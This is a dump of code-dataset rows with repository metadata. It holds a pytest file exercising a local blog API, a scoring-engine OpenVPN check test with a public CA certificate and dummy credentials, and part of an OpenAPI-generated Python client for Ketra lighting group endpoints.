] | null | null | null | tests/test_1.py | PhilipHarries/webms_blogservice | d052f93a1b5fad62f19c0e5fb48e9646ceafd220 | [
"MIT"
] | null | null | null | # import pytest
import requests
localport = 5434
def test_get_blogs():
payload = {
"description": "desc",
"title": "title",
"author": "author",
"content": "content",
"id": "test_post_blog_1",
"tags": "test"
}
r = requests.post("http://localhost:{}/blog/api/v1.0/blogs".format(localport), json=payload)
r = requests.get("http://127.0.0.1:{}/blog/api/v1.0/blogs".format(localport))
assert r.status_code == 200
assert "blogs" in r.json()
assert len(r.json()["blogs"]) > 0
assert "author" in r.json()["blogs"][0]
assert "title" in r.json()["blogs"][0]
assert "id" in r.json()["blogs"][0]
assert "description" in r.json()["blogs"][0]
assert "content" in r.json()["blogs"][0]
assert "tags" in r.json()["blogs"][0]
assert "last-update" in r.json()["blogs"][0]
assert "created-date" in r.json()["blogs"][0]
def test_post_and_get_and_update_and_delete_blog():
payload = {
"description": "desc",
"title": "title",
"author": "author",
"content": "content",
"id": "test_post_blog_2",
"tags": "test"
}
r = requests.post("http://localhost:{}/blog/api/v1.0/blogs".format(localport), json=payload)
assert r.status_code == 201
assert r.json()["blog"]["description"] == "desc"
assert r.json()["blog"]["author"] == "author"
assert r.json()["blog"]["content"] == "content"
assert r.json()["blog"]["id"] == "test_post_blog_2"
assert r.json()["blog"]["tags"] == "test"
assert r.json()["blog"]["title"] == "title"
assert "created-date" in r.json()["blog"]
assert "last-update" in r.json()["blog"]
assert "uri" in r.json()["blog"]
r = requests.get("http://localhost:{}/blog/api/v1.0/blog/test_post_blog_2".format(localport))
assert r.status_code == 200
assert r.json()["blog"]["description"] == "desc"
assert r.json()["blog"]["author"] == "author"
assert r.json()["blog"]["content"] == "content"
assert r.json()["blog"]["id"] == "test_post_blog_2"
assert r.json()["blog"]["tags"] == "test"
assert r.json()["blog"]["title"] == "title"
assert "created-date" in r.json()["blog"]
assert "last-update" in r.json()["blog"]
assert "uri" in r.json()["blog"]
payload = {
"description": "desc",
"title": "title",
"author": "author",
"content": "new content",
"id": "test_post_blog_2",
"tags": "test"
}
r = requests.put("http://localhost:{}/blog/api/v1.0/blog/test_post_blog_2".format(localport), json=payload)
assert r.status_code == 200
r = requests.get("http://localhost:{}/blog/api/v1.0/blog/test_post_blog_2".format(localport))
assert r.status_code == 200
assert r.json()["blog"]["content"] == "new content"
r = requests.delete("http://localhost:{}/blog/api/v1.0/blog/test_post_blog_2".format(localport))
assert r.status_code == 200
r = requests.get("http://localhost:{}/blog/api/v1.0/blog/test_post_blog_2".format(localport))
assert r.status_code == 404
| 39.063291 | 111 | 0.588788 | 423 | 3,086 | 4.184397 | 0.111111 | 0.081921 | 0.09661 | 0.110169 | 0.884181 | 0.867232 | 0.776271 | 0.767797 | 0.728814 | 0.69774 | 0 | 0.026485 | 0.192482 | 3,086 | 78 | 112 | 39.564103 | 0.683788 | 0.004213 | 0 | 0.652778 | 0 | 0 | 0.337024 | 0 | 0 | 0 | 0 | 0 | 0.5 | 1 | 0.027778 | false | 0 | 0.013889 | 0 | 0.041667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7a8c4dbd41ab363b4c5d95f8128855c21da3a30b | 2,624 | py | Python | tests/scoring_engine/checks/test_openvpn.py | Dieff/scoringengine | 81eb7f07e4bfe9e9e9a52fc57a211796f0116bdc | [
"MIT"
] | 79 | 2018-05-26T19:58:58.000Z | 2022-03-28T02:00:53.000Z | tests/scoring_engine/checks/test_openvpn.py | Dieff/scoringengine | 81eb7f07e4bfe9e9e9a52fc57a211796f0116bdc | [
"MIT"
] | 135 | 2018-06-08T05:59:10.000Z | 2022-03-22T03:06:47.000Z | tests/scoring_engine/checks/test_openvpn.py | Dieff/scoringengine | 81eb7f07e4bfe9e9e9a52fc57a211796f0116bdc | [
"MIT"
] | 30 | 2018-04-15T19:42:56.000Z | 2022-02-11T00:58:01.000Z | from scoring_engine.engine.basic_check import CHECKS_BIN_PATH
from tests.scoring_engine.checks.check_test import CheckTest
class TestOpenVPNCheck(CheckTest):
check_name = 'OpenVPNCheck'
properties = {
'ca': "MIIDSzCCAjOgAwIBAgIUNf7YivHK0rWciIy1HsNNx/tGDt4wDQYJKoZIhvcNAQELBQAwFjEUMBIGA1UEAwwLRWFzeS1SU0EgQ0EwHhcNMTkwMjE1MDI0NzUyWhcNMjkwMjEyMDI0NzUyWjAWMRQwEgYDVQQDDAtFYXN5LVJTQSBDQTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAKCNXjK+4bIikgmGoGZHWRmLoJRxPoBkuy2U1jkaADBrfg4b3CgLP/OV4PGv1SmCvvLMuvdwKjA9JnYgtbEWLYyOi/Kxssjm5nLpJbx6KBZOvRjVzoKO0ljNh5nAXDiOyR+2PBUgp7A3PImM4R05m5pi+jd8+WbrQ8nfNQ5o9bFX26WpvWHo7gTxT8u+e6nL25U6TUYrPuTbw2/PGylaOVlEZTFhDO1GgxUUuPAwAmloQSoAbSNTI6Ch2mE8c3/dyyf4E1m6x7ves2cV44KQv8wTkLi1vQlhILmsjyH5oxlZARFl/hWXo6EBodLKVtVu8lWfNO4Le3qBYOijGfZQEB0CAwEAAaOBkDCBjTAdBgNVHQ4EFgQUG7NBOgwKvoAHZpwodZ45wVhpuUIwUQYDVR0jBEowSIAUG7NBOgwKvoAHZpwodZ45wVhpuUKhGqQYMBYxFDASBgNVBAMMC0Vhc3ktUlNBIENBghQ1/tiK8crStZyIjLUew03H+0YO3jAMBgNVHRMEBTADAQH/MAsGA1UdDwQEAwIBBjANBgkqhkiG9w0BAQsFAAOCAQEAXvwmtRzcLhdtJoNlK8Cc+BxjK9mgURgh4qt8BMP28CMfKw36xXWgxsbi4g5v08ohn+GrBikPmicL5p/V5yo6cC63Q0uI04k2k+jlC8PRXheyhQjYwSF6Ua18gAyXInR1GZ7t5l2OOBP5MWLGJxpLE8Xp1yn7v0kyAMXA3hOICi1BdS844ZVWhwiasm+BE7lybdtf15sAdYGmAjrrKwtCOlJSJrzOZLThUUlgGlwK2PAdeyYTkoQGyY3cKTfmsujTzyLsHKvqk7RPbKelvSfx1XEf1lH34305N8VSJQVc2UhNlaTS6YWJOyYVHPUsAqq8fJF4aZRd87VnhtOev3rKaA=="
}
accounts = {
'test': 'test'
}
cmd = CHECKS_BIN_PATH + "/openvpn_check '127.0.0.1' 1234 'test' 'test' 'MIIDSzCCAjOgAwIBAgIUNf7YivHK0rWciIy1HsNNx/tGDt4wDQYJKoZIhvcNAQELBQAwFjEUMBIGA1UEAwwLRWFzeS1SU0EgQ0EwHhcNMTkwMjE1MDI0NzUyWhcNMjkwMjEyMDI0NzUyWjAWMRQwEgYDVQQDDAtFYXN5LVJTQSBDQTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAKCNXjK+4bIikgmGoGZHWRmLoJRxPoBkuy2U1jkaADBrfg4b3CgLP/OV4PGv1SmCvvLMuvdwKjA9JnYgtbEWLYyOi/Kxssjm5nLpJbx6KBZOvRjVzoKO0ljNh5nAXDiOyR+2PBUgp7A3PImM4R05m5pi+jd8+WbrQ8nfNQ5o9bFX26WpvWHo7gTxT8u+e6nL25U6TUYrPuTbw2/PGylaOVlEZTFhDO1GgxUUuPAwAmloQSoAbSNTI6Ch2mE8c3/dyyf4E1m6x7ves2cV44KQv8wTkLi1vQlhILmsjyH5oxlZARFl/hWXo6EBodLKVtVu8lWfNO4Le3qBYOijGfZQEB0CAwEAAaOBkDCBjTAdBgNVHQ4EFgQUG7NBOgwKvoAHZpwodZ45wVhpuUIwUQYDVR0jBEowSIAUG7NBOgwKvoAHZpwodZ45wVhpuUKhGqQYMBYxFDASBgNVBAMMC0Vhc3ktUlNBIENBghQ1/tiK8crStZyIjLUew03H+0YO3jAMBgNVHRMEBTADAQH/MAsGA1UdDwQEAwIBBjANBgkqhkiG9w0BAQsFAAOCAQEAXvwmtRzcLhdtJoNlK8Cc+BxjK9mgURgh4qt8BMP28CMfKw36xXWgxsbi4g5v08ohn+GrBikPmicL5p/V5yo6cC63Q0uI04k2k+jlC8PRXheyhQjYwSF6Ua18gAyXInR1GZ7t5l2OOBP5MWLGJxpLE8Xp1yn7v0kyAMXA3hOICi1BdS844ZVWhwiasm+BE7lybdtf15sAdYGmAjrrKwtCOlJSJrzOZLThUUlgGlwK2PAdeyYTkoQGyY3cKTfmsujTzyLsHKvqk7RPbKelvSfx1XEf1lH34305N8VSJQVc2UhNlaTS6YWJOyYVHPUsAqq8fJF4aZRd87VnhtOev3rKaA=='"
| 174.933333 | 1,210 | 0.937881 | 83 | 2,624 | 29.53012 | 0.542169 | 0.010608 | 0.010608 | 0.24643 | 0.906569 | 0.906569 | 0.906569 | 0.906569 | 0.906569 | 0.906569 | 0 | 0.116261 | 0.029726 | 2,624 | 14 | 1,211 | 187.428571 | 0.846426 | 0 | 0 | 0 | 0 | 0.181818 | 0.889482 | 0.863567 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.181818 | 0 | 0.636364 | 0 | 0 | 0 | 1 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 14 |
8f8fd2ae3c9d5f0272e83c9b166ab3848dcf8414 | 50,588 | py | Python | aioketraapi/api/group_operations_api.py | s4v4g3/aio-ketra-api | 1c8fefa2a66d4a66addeefdc33c71b2f0faa1137 | [
"MIT"
] | null | null | null | aioketraapi/api/group_operations_api.py | s4v4g3/aio-ketra-api | 1c8fefa2a66d4a66addeefdc33c71b2f0faa1137 | [
"MIT"
] | null | null | null | aioketraapi/api/group_operations_api.py | s4v4g3/aio-ketra-api | 1c8fefa2a66d4a66addeefdc33c71b2f0faa1137 | [
"MIT"
] | null | null | null | # coding: utf-8
"""
Ketra Lighting API
Control your Ketra lights # noqa: E501
The version of the OpenAPI document: 1.4.0
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from aioketraapi.api_client import ApiClient
from aioketraapi.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class GroupOperationsApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def groups_get(self, **kwargs): # noqa: E501
"""Gets the list of groups # noqa: E501
Gets the list of lamp groups in the system # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.groups_get(async_req=True)
>>> result = thread.get()
:param basicauthuser: Username to use in place of username in basic authentication header. For a secure installation, this value is ignored but still must be supplied unless a basic authentication header is sent with the request.
:type basicauthuser: str
:param basicauthpassword: Password to use in place of password in basic authentication header. For a secure installation, this should be an oauth token for a user with access to the installation. If a basic authentication header is sent, this parameter is ignored. If no basic authentication header is sent, this parameter as well as the basicauthuser parameter must be supplied if the hub is a member of a secure installation.
:type basicauthpassword: str
:param name: If specified, only the groups matching the string provided are returned
:type name: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: InlineResponse20012
"""
kwargs['_return_http_data_only'] = True
return self.groups_get_with_http_info(**kwargs) # noqa: E501
def groups_get_with_http_info(self, **kwargs): # noqa: E501
"""Gets the list of groups # noqa: E501
Gets the list of lamp groups in the system # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.groups_get_with_http_info(async_req=True)
>>> result = thread.get()
:param basicauthuser: Username to use in place of username in basic authentication header. For a secure installation, this value is ignored but still must be supplied unless a basic authentication header is sent with the request.
:type basicauthuser: str
:param basicauthpassword: Password to use in place of password in basic authentication header. For a secure installation, this should be an oauth token for a user with access to the installation. If a basic authentication header is sent, this parameter is ignored. If no basic authentication header is sent, this parameter as well as the basicauthuser parameter must be supplied if the hub is a member of a secure installation.
:type basicauthpassword: str
:param name: If specified, only the groups matching the string provided are returned
:type name: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(InlineResponse20012, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'basicauthuser',
'basicauthpassword',
'name'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method groups_get" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'basicauthuser' in local_var_params and local_var_params['basicauthuser'] is not None: # noqa: E501
query_params.append(('basicauthuser', local_var_params['basicauthuser'])) # noqa: E501
if 'basicauthpassword' in local_var_params and local_var_params['basicauthpassword'] is not None: # noqa: E501
query_params.append(('basicauthpassword', local_var_params['basicauthpassword'])) # noqa: E501
if 'name' in local_var_params and local_var_params['name'] is not None: # noqa: E501
query_params.append(('Name', local_var_params['name'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/Groups', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse20012', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def groups_group_id_get(self, group_id, **kwargs): # noqa: E501
"""Gets a single group object # noqa: E501
Gets the group specified by {group-id}. If a group name is specified instead of a uuid, the first group matching the specified name will be returned # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.groups_group_id_get(group_id, async_req=True)
>>> result = thread.get()
:param group_id: The group's name or unique identifier (uuid) (required)
:type group_id: str
:param basicauthuser: Username to use in place of username in basic authentication header. For a secure installation, this value is ignored but still must be supplied unless a basic authentication header is sent with the request.
:type basicauthuser: str
:param basicauthpassword: Password to use in place of password in basic authentication header. For a secure installation, this should be an oauth token for a user with access to the installation. If a basic authentication header is sent, this parameter is ignored. If no basic authentication header is sent, this parameter as well as the basicauthuser parameter must be supplied if the hub is a member of a secure installation.
:type basicauthpassword: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: InlineResponse20013
"""
kwargs['_return_http_data_only'] = True
return self.groups_group_id_get_with_http_info(group_id, **kwargs) # noqa: E501
def groups_group_id_get_with_http_info(self, group_id, **kwargs): # noqa: E501
"""Gets a single group object # noqa: E501
Gets the group specified by {group-id}. If a group name is specified instead of a uuid, the first group matching the specified name will be returned # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.groups_group_id_get_with_http_info(group_id, async_req=True)
>>> result = thread.get()
:param group_id: The group's name or unique identifier (uuid) (required)
:type group_id: str
:param basicauthuser: Username to use in place of username in basic authentication header. For a secure installation, this value is ignored but still must be supplied unless a basic authentication header is sent with the request.
:type basicauthuser: str
:param basicauthpassword: Password to use in place of password in basic authentication header. For a secure installation, this should be an oauth token for a user with access to the installation. If a basic authentication header is sent, this parameter is ignored. If no basic authentication header is sent, this parameter as well as the basicauthuser parameter must be supplied if the hub is a member of a secure installation.
:type basicauthpassword: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(InlineResponse20013, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'group_id',
'basicauthuser',
'basicauthpassword'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method groups_group_id_get" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'group_id' is set
if self.api_client.client_side_validation and ('group_id' not in local_var_params or # noqa: E501
local_var_params['group_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `group_id` when calling `groups_group_id_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'group_id' in local_var_params:
path_params['group-id'] = local_var_params['group_id'] # noqa: E501
query_params = []
if 'basicauthuser' in local_var_params and local_var_params['basicauthuser'] is not None: # noqa: E501
query_params.append(('basicauthuser', local_var_params['basicauthuser'])) # noqa: E501
if 'basicauthpassword' in local_var_params and local_var_params['basicauthpassword'] is not None: # noqa: E501
query_params.append(('basicauthpassword', local_var_params['basicauthpassword'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/Groups/{group-id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse20013', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def groups_group_id_state_get(self, group_id, **kwargs): # noqa: E501
"""Gets the state of a single lamp group # noqa: E501
Gets the state of the group specified by {group-id}. If a group name is specified instead of a uuid, the state of the first group matching the specified name will be returned. Note that for API schema 3 (hub firmware 1.14) or earlier, this will only reflect the state of the last group operation -- light changes due to keypad operations are not reflected in the returned state. However in API schema 4 / hub firmware 1.15, if the hub is published with Design Studio 2.0 (and the 'SupportsZoneKeypads' property returned in GET /Hub is true), the lamp state returned will reflect the current state of the group. Please see the API overview document for more discussion on this topic. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.groups_group_id_state_get(group_id, async_req=True)
>>> result = thread.get()
:param group_id: The group's name or unique identifier (uuid) (required)
:type group_id: str
:param basicauthuser: Username to use in place of username in basic authentication header. For a secure installation, this value is ignored but still must be supplied unless a basic authentication header is sent with the request.
:type basicauthuser: str
:param basicauthpassword: Password to use in place of password in basic authentication header. For a secure installation, this should be an oauth token for a user with access to the installation. If a basic authentication header is sent, this parameter is ignored. If no basic authentication header is sent, this parameter as well as the basicauthuser parameter must be supplied if the hub is a member of a secure installation.
:type basicauthpassword: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: InlineResponse20014
"""
kwargs['_return_http_data_only'] = True
return self.groups_group_id_state_get_with_http_info(group_id, **kwargs) # noqa: E501
def groups_group_id_state_get_with_http_info(self, group_id, **kwargs): # noqa: E501
"""Gets the state of a single lamp group # noqa: E501
Gets the state of the group specified by {group-id}. If a group name is specified instead of a uuid, the state of the first group matching the specified name will be returned. Note that for API schema 3 (hub firmware 1.14) or earlier, this will only reflect the state of the last group operation -- light changes due to keypad operations are not reflected in the returned state. However in API schema 4 / hub firmware 1.15, if the hub is published with Design Studio 2.0 (and the 'SupportsZoneKeypads' property returned in GET /Hub is true), the lamp state returned will reflect the current state of the group. Please see the API overview document for more discussion on this topic. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.groups_group_id_state_get_with_http_info(group_id, async_req=True)
>>> result = thread.get()
:param group_id: The group's name or unique identifier (uuid) (required)
:type group_id: str
:param basicauthuser: Username to use in place of username in basic authentication header. For a secure installation, this value is ignored but still must be supplied unless a basic authentication header is sent with the request.
:type basicauthuser: str
:param basicauthpassword: Password to use in place of password in basic authentication header. For a secure installation, this should be an oauth token for a user with access to the installation. If a basic authentication header is sent, this parameter is ignored. If no basic authentication header is sent, this parameter as well as the basicauthuser parameter must be supplied if the hub is a member of a secure installation.
:type basicauthpassword: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(InlineResponse20014, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'group_id',
'basicauthuser',
'basicauthpassword'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method groups_group_id_state_get" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'group_id' is set
if self.api_client.client_side_validation and ('group_id' not in local_var_params or # noqa: E501
local_var_params['group_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `group_id` when calling `groups_group_id_state_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'group_id' in local_var_params:
path_params['group-id'] = local_var_params['group_id'] # noqa: E501
query_params = []
if 'basicauthuser' in local_var_params and local_var_params['basicauthuser'] is not None: # noqa: E501
query_params.append(('basicauthuser', local_var_params['basicauthuser'])) # noqa: E501
if 'basicauthpassword' in local_var_params and local_var_params['basicauthpassword'] is not None: # noqa: E501
query_params.append(('basicauthpassword', local_var_params['basicauthpassword'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/Groups/{group-id}/State', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse20014', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def groups_group_id_state_put(self, group_id, lamp_state, **kwargs): # noqa: E501
"""Sets the state of a single lamp group # noqa: E501
Set the state of the group specified by {group-id}. If a group name is specified instead of a uuid, the state of the first group matching the specified name will be set # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.groups_group_id_state_put(group_id, lamp_state, async_req=True)
>>> result = thread.get()
:param group_id: The group's name or unique identifier (uuid) (required)
:type group_id: str
:param lamp_state: Color settings to apply to the lamp group (required)
:type lamp_state: LampState
:param basicauthuser: Username to use in place of username in basic authentication header. For a secure installation, this value is ignored but still must be supplied unless a basic authentication header is sent with the request.
:type basicauthuser: str
:param basicauthpassword: Password to use in place of password in basic authentication header. For a secure installation, this should be an oauth token for a user with access to the installation. If a basic authentication header is sent, this parameter is ignored. If no basic authentication header is sent, this parameter as well as the basicauthuser parameter must be supplied if the hub is a member of a secure installation.
:type basicauthpassword: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: InlineResponse20014
"""
kwargs['_return_http_data_only'] = True
return self.groups_group_id_state_put_with_http_info(group_id, lamp_state, **kwargs) # noqa: E501
def groups_group_id_state_put_with_http_info(self, group_id, lamp_state, **kwargs): # noqa: E501
"""Sets the state of a single lamp group # noqa: E501
Set the state of the group specified by {group-id}. If a group name is specified instead of a uuid, the state of the first group matching the specified name will be set # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.groups_group_id_state_put_with_http_info(group_id, lamp_state, async_req=True)
>>> result = thread.get()
:param group_id: The group's name or unique identifier (uuid) (required)
:type group_id: str
:param lamp_state: Color settings to apply to the lamp group (required)
:type lamp_state: LampState
:param basicauthuser: Username to use in place of username in basic authentication header. For a secure installation, this value is ignored but still must be supplied unless a basic authentication header is sent with the request.
:type basicauthuser: str
:param basicauthpassword: Password to use in place of password in basic authentication header. For a secure installation, this should be an oauth token for a user with access to the installation. If a basic authentication header is sent, this parameter is ignored. If no basic authentication header is sent, this parameter as well as the basicauthuser parameter must be supplied if the hub is a member of a secure installation.
:type basicauthpassword: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(InlineResponse20014, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'group_id',
'lamp_state',
'basicauthuser',
'basicauthpassword'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method groups_group_id_state_put" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'group_id' is set
if self.api_client.client_side_validation and ('group_id' not in local_var_params or # noqa: E501
local_var_params['group_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `group_id` when calling `groups_group_id_state_put`") # noqa: E501
# verify the required parameter 'lamp_state' is set
if self.api_client.client_side_validation and ('lamp_state' not in local_var_params or # noqa: E501
local_var_params['lamp_state'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `lamp_state` when calling `groups_group_id_state_put`") # noqa: E501
collection_formats = {}
path_params = {}
if 'group_id' in local_var_params:
path_params['group-id'] = local_var_params['group_id'] # noqa: E501
query_params = []
if 'basicauthuser' in local_var_params and local_var_params['basicauthuser'] is not None: # noqa: E501
query_params.append(('basicauthuser', local_var_params['basicauthuser'])) # noqa: E501
if 'basicauthpassword' in local_var_params and local_var_params['basicauthpassword'] is not None: # noqa: E501
query_params.append(('basicauthpassword', local_var_params['basicauthpassword'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'lamp_state' in local_var_params:
body_params = local_var_params['lamp_state']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
